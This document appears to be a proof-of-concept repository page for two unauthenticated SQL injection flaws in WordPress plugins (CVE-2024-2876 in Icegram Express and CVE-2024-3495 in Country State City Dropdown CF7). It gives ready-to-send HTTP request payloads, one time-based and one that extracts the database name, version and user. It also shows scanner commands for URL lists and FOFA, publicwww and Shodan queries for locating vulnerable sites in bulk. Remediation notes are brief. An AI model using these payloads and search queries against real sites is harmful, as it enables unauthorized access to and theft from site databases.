CVE-2024-2876 PoC — Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin <= 5.7.14 - Unauthenticated SQL Injecti

Source

Associated Vulnerability

Description

WP-SQL-Injection CVE-2024-2876 AND 2024-CVE-2024-3495

Readme

---

# WP-SQL Injection Vulnerabilities: CVE-2024-2876 and CVE-2024-3495

This repository documents two SQL injection vulnerabilities affecting WordPress plugins. Below are descriptions, queries, proof of concept (PoC) scripts, and remediation steps for each vulnerability.

## Vulnerability Descriptions

### Description - CVE-2024-2876
The **Email Subscribers by Icegram Express** plugin for WordPress (versions up to 5.7.14) is vulnerable to SQL injection in the `run` function of the `IG_ES_Subscribers_Query` class. Due to insufficient escaping and lack of SQL query preparation, unauthenticated attackers can exploit this vulnerability to inject malicious SQL, potentially accessing sensitive data.

### Description - CVE-2024-3495
The **Country State City Dropdown CF7** plugin for WordPress (versions up to 2.7.2) is vulnerable to SQL injection via the `cnt` and `sid` parameters. This insufficient escaping allows unauthenticated attackers to execute arbitrary SQL commands, leading to unauthorized access to sensitive database information.

## Scanner Script
To scan for vulnerabilities in CVE-2024-2876 and CVE-2024-3495, use the following script:

```bash
python3 CVE-2024-2876.py -u http://website.com
python3 CVE-2024-2876.py -f urls.txt
```

## Querying for Affected Sites

### Query for CVE-2024-2876
- **FOFA**: `body="/wp-content/plugins/email-subscribers/"`
- **publicwww**: `"/wp-content/plugins/email-subscribers/"`

### Query for CVE-2024-3495
- **FOFA**: `body="/wp-content/plugins/country-state-city-auto-dropdown" && header="HTTP/1.1 200 OK"`
- **Publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **Shodan**: `"http.title:admin-ajax.php"`

## Proof of Concept (PoC) Code Blocks

### PoC - CVE-2024-2876
Example exploit using the SQL injection vulnerability via the `admin-post.php` endpoint:

```bash
@timeout: 20s (using burpsuite)
POST /wp-admin/admin-post.php HTTP/1.1
Host: <Host>
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```

### PoC - CVE-2024-3495
Example exploit using `admin-ajax.php`:

```bash
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```

## Remediation Steps

### Remediation for CVE-2024-2876
- **Upgrade**: Update the plugin to version 5.7.15 or later (preferably 5.7.19).
- **Automatic Updates**: Patchstack users can enable automatic updates for vulnerable plugins.
- **WAF/WAAP**: Implementing a Web Application Firewall (WAF) or Web Application and API Protection (WAAP) solution can offer protection against known vulnerabilities by blocking suspicious SQL patterns.

## Bounty Information - CVE-2024-2876
For more information on the CVE and bounty details, visit:
- [Wordfence Blog on CVE-2024-2876](https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/)

--- 

File Snapshot

 [4.0K]  /data/pocs/02b832679901c71eb1a7f9ad3ad62955a2f9df27
├── [5.1K]  CVE-2024-2876.py
├── [ 845]  CVE-2024-2876.yaml
├── [ 944]  CVE-2024-3495.yaml
└── [3.5K]  README.md

0 directories, 4 files

Remarks